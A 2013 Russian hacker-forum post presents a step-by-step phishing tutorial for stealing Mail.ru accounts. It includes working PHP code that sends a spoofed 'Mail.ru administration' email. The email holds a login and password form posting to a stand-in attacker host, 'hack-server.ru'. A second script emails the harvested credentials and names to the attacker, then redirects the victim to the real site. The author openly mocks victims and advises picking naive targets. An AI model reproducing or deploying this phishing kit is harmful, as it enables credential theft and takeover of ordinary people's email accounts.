Хакерский софт и услуги. Программирование. Взлом. Форум сайта - SoftXaker.Ru
Старый 05.02.2013, 15:12   #1
22ev
Залётный
 
Регистрация: 04.02.2013
Сообщений: 1
22ev на пути к лучшему
Восклицание Воруем почту с помощью письма

В этой статье я расскажу, как украсть электронную почту путём социальной инженерии, проще говоря, с помощью поддельного письма. Почтовые серверы постоянно совершенствуются, дырки в них латаются, но этот способ, чувствую, будет работать вечно, ибо не перевелись ещё на Руси дураки. В то же время не забываем про статьи 272 и 138, они всё ещё в действии. Но, к делу!

Для этого способа нам не понадобится никаких технических и программных средств – только прямые руки и голова. Смысл взлома прост – пользователь получает письмо, якобы от администрации почтового сервера с просьбой ввести в форме свои логин и пароль, поскольку «меняется оборудование». После того, как пользователь нажал кнопку отправить, все данные перелетают на другой сервер, после чего пользователь перенаправляется на mail.ru.

Самое главное – подделать письмо так, чтобы пользователь поверил, что оно настоящее. Для этого подделаем ящик [Ссылки могут видеть только зарегистрированные пользователи. ], а само письмо должно содержать фразы типа «приносим свои извинения за доставленные неудобства».
Делаем письмо:
PHP код:
<?php
$subject
="Внимание! Перенос вашего аккаунта на новый сервер!";
$header="Content-type: text/html; charset=windows-1251 \r\n";
$header.="From: Администрация Mail.Ru <[Ссылки могут видеть только зарегистрированные пользователи. ]>\r\n";
$header.="Subject: $subject \r\n";
$header.="Content-type: text/html; charset=windows-1251 \r\n";
$msg="<body>
<table width=100% height=40 cellpadding=0 cellspacing=0 class=blue  bgcolor='#00468C'>
<td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td>
<td class=logo><img src=http://img.mail.ru/r/blogs/prjlogo_mail.gif width=104 height=21></td>
<td width=100%> </td>
<td class=vcor><img src=http://img.mail.ru/0.gif width=1 height=1></td>
</table>
<br>
<b>Уважаемый пользователь [Ссылки могут видеть только зарегистрированные пользователи. ]!</b><br>
От лица нашего интернет-холдинга Mail.ru мы просим извинения за причинение
вам некоторых неудобств.
В связи со сменой нашего оборудования на более новое нам нужно
перенести часть аккаунтов на новое оборудование.
Соответственно просим повторно прислать некоторую информацию о своем аккаунте.
Это нужно для предотвращения всякого рода ошибок и неточностей.<br>
<b><font color='#ff0000'>В противном случае Вы можете лишиться своего
почтового ящика!</font></b><br><br>
<b>Заполните нижеприведенную форму:</b>
<form method='post' action='http://hack-server.ru/form.php'>
<table width='400px' cellpadding=0 cellspacing=0>
<tr><td><b>Ваш Логин: </b></td><td><input type='text' name='login'>@mail.ru</td></tr>
<tr><td><b>Ваш Пароль: </b></td><td><input type='password' name='pass'></td></tr>
<tr><td><b>Подтвердите Ваш пароль: </b></td><td><input type='password' name='pass2'></td></tr>
<tr><td><b>Имя: </b></td><td><input type='text' name='name'></td></tr>
<tr><td><b>Фамилия: </b></td><td><input type='text' name='family'></td></tr>
</table>
<input type='submit' value='Отправить'>
</form>
Спасибо за то, что Вы являетесь пользователем Mail.Ru.<br>
С уважением, администрация Mail.ru
<br><br><br><br><br></body>"
;
mail('[Ссылки могут видеть только зарегистрированные пользователи. ]'$subject$msg$header);?>
Пользователь получает примерно такое письмо:

Наивный пользователь заполняет все поля и отправляет письмо. А его данные переписываются в скрипт, который Вы напишете в теге form. Берём данные и кидаем лох...пользователя обратно:
PHP код:
<?php
$header
="Content-type: text/html; charset=windows-1251 \r\n";
$header.="Content-type: text/html; charset=windows-1251 \r\n";    

$msg $_POST['login'];
$subject  'логин: '.$_POST['login'].'<br>';
$subject .= 'пароль: '.$_POST['pass'].'<br>';
$subject .= 'имя: '.$_POST['name'].'<br>';
$subject .= 'фамалия: '.$_POST['family'];    

mail("[Ссылки могут видеть только зарегистрированные пользователи. ]"$msg$subject$header);
$location $_SERVER['HTTP_REFERER'];
header("Location: http://win.mail.ru/cgi-bin/start?top=1");
?>
Если кто-то ещё не понял, то нам необходим сервак, с которого будем отправлять "письмо". Сервер должен поддерживать РНР и иметь бесплатный хостинг. Ссылок не даю, а то совсем нечестно будет. Поищите, есть такие, есть. И ещё - способ довольно простой, так что ищите пользователей понаивнее. Удачи!
22ev вне форума  



Метки
взлом почты

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход




Powered by SoftXaker® Version 3.5.1
, Форум хакеров и программистов: Forum.SoftXaker.ru
Софт для взлома и защиты. Хакерский софт.
Лаборатория Хакера |